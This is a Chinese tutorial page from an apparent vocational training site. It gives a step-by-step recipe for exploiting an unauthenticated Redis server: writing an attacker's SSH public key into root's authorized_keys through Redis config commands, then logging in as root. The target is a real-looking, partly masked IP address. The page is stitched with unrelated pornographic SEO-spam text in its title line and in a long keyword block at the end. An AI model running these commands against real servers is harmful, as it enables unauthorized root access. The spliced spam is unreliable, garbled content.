麻豆黑色丝袜jk制服福利网站-麻豆精品传媒视频观看-麻豆精品传媒一二三区在线视频-麻豆精选传媒4区2021-在线视频99-在线视频a

千鋒教育-做有情懷、有良心、有品質的職業教育機構

手機站
千鋒教育

千鋒學習站 | 隨時隨地免費學

千鋒教育

掃一掃進入千鋒手機站

領取全套視頻
千鋒教育

關注千鋒學習站小程序
隨時隨地免費學習課程

當前位置:首頁  >  技術干貨  > redis未授權訪問配合ssh免密登錄getshell

redis未授權訪問配合ssh免密登錄getshell

來源:千鋒教育
發布人:wjy
時間: 2022-09-08 13:55:02 1662616502

  在一次滲透測試中拿到一個ip地址52.80.249.xx,nmap端口掃描出22,6379,80端口,目標機是linux系統的一臺服務器,6379為redis的默認端口,嘗試對其進行利用。使用kali作為攻擊機

  一、環境準備

  1.1、在攻擊機上面下載redis

  wget http://download.redis.io/releases/redis-2.8.17.tar.gz

redis未授權訪問配合ssh免密登錄getshell1

  1.2解壓文件,執行文件

  解壓文件:

  tar xzf redis-2.8.17.tar.gz

  進入redis目錄:

  cd redis-2.8.17

  安裝:make

redis未授權訪問配合ssh免密登錄getshell2

  1.3、進入src目錄,將redis-server和redis-cli拷貝到/usr/bin目錄下(這樣以后啟動redis就不用進入安裝目錄了)

  cd src

  cp redis-server /usr/bin

  cp redis-cli /usr/bin

redis未授權訪問配合ssh免密登錄getshell3

  1.4、返回目錄redis-2.8.17,將redis.conf拷貝到/etc/目錄下

  cd ../

  cp redis.conf /etc/

redis未授權訪問配合ssh免密登錄getshell4

  1.5、使用/etc/目錄下的reids.conf文件中的配置啟動redis服務:

  redis-server /etc/redis.conf

redis未授權訪問配合ssh免密登錄getshell5

  1.6、然后ctrl+c退出,再次進入src目錄然后連接目標靶機的redis服務

  ctrl+c

  cd src

  redis-cli –h 52.80.249.xx

redis未授權訪問配合ssh免密登錄getshell6

  出現52.80.249.xx:6379>就代表連接成功,并且沒有輸入密碼

  二、漏洞利用

  2.1、這里附上一個這里沒法利用的一種 攻擊方式截圖(沒有測試僅供參考)

redis未授權訪問配合ssh免密登錄getshell7

  2.2、我們這里是不知道路徑的,根據前期信息收集知道還有ssh服務的22端口是開放的,可以利用“公私鑰”認證獲取root權限

  使用ssh生成公鑰和私鑰文件

  ssh-keygen -t rsa

redis未授權訪問配合ssh免密登錄getshell8

  2.3、進入.ssh文件下,將上面生成的公鑰保存到1.txt里面

  cd /root/.ssh

  (echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > 1.txt

redis未授權訪問配合ssh免密登錄getshell9

  2.4、將生成的公鑰文件通過redis上傳到目標服務器

  cat 1.txt | redis-cli -h 52.80.249.xx -x set crack

redis未授權訪問配合ssh免密登錄getshell10

  2.5、遠程連接redis服務

  redis-cli -h 52.80.249.xx

redis未授權訪問配合ssh免密登錄getshell11

  2.6、獲得redis備份的路徑

  config get dir

redis未授權訪問配合ssh免密登錄getshell12

  2.7、更改redis備份路徑為ssh公鑰存放目錄(一般默認為/root/.ssh):

redis未授權訪問配合ssh免密登錄getshell13

  2.8、設置上傳公鑰的備份文件名字為authorized_keys:

  config set dbfilename authorized_keys

redis未授權訪問配合ssh免密登錄getshell14

  2.9、檢查是否更改成功(查看有沒有authorized_keys文件),沒有問題就保存然后退出,至此成功寫入ssh公鑰到靶機

  config get dbfilename

redis未授權訪問配合ssh免密登錄getshell15

  2.10、攻擊機直接ssh連接目標服務器

  ssh -i id_rsa root@52.80.249.xx

redis未授權訪問配合ssh免密登錄getshell16

tags:
聲明:本站稿件版權均屬千鋒教育所有,未經許可不得擅自轉載。
10年以上業內強師集結,手把手帶你蛻變精英
請您保持通訊暢通,專屬學習老師24小時內將與您1V1溝通
免費領取
今日已有369人領取成功
劉同學 138****2860 剛剛成功領取
王同學 131****2015 剛剛成功領取
張同學 133****4652 剛剛成功領取
李同學 135****8607 剛剛成功領取
楊同學 132****5667 剛剛成功領取
岳同學 134****6652 剛剛成功領取
梁同學 157****2950 剛剛成功領取
劉同學 189****1015 剛剛成功領取
張同學 155****4678 剛剛成功領取
鄒同學 139****2907 剛剛成功領取
董同學 138****2867 剛剛成功領取
周同學 136****3602 剛剛成功領取
相關推薦HOT
主站蜘蛛池模板: 欧美日韩亚洲国产精品| v片免费在线观看| 在线看福利影| 国产精品日韩欧美一区二区三区| 国产白白白在线永久播放| 欧美日韩欧美| 国产亚洲精品一品区99热| 一线在线观看全集免费高清中文| 99麻豆视频| 国产国产人免费人成免费视频| 国产熟睡乱子伦视频| 军人武警gay男同gvus69| 男生女生一起差差差视频| 精品一区二区久久久久久久网站| 正在播放暮町ゆう子在线观看| 久re这里只有精品最新地址| 好男人社区神马www| 无套影院| 2022国产麻豆剧果冻传媒影视| 最新版天堂中文在线| 最新国产精品亚洲| 欧美亚洲一二三区| 亚洲欧美国产精品第1页| 免费看a级毛片| 国产国产成人精品久久| 再深点灬舒服灬太大了短文d| 美女被网站大全在线视频| 岛国片免费在线观看| 深夜动态福利gif动态进| 高清男的插曲女的欢迎你老狼| 韩国v欧美v亚洲v日本v| 亚洲国产成人久久综合一区77| 十九岁日本电影免费完整版观看 | 女人国产香蕉久久精品| 国产精品入口麻豆免费| 久久中文网中文字幕| 欧美一级黄色片视频| 亚洲免费综合色在线视频| 在线天堂bt种子| 好男人社区神马在线观看www| 欧美激情一区二区|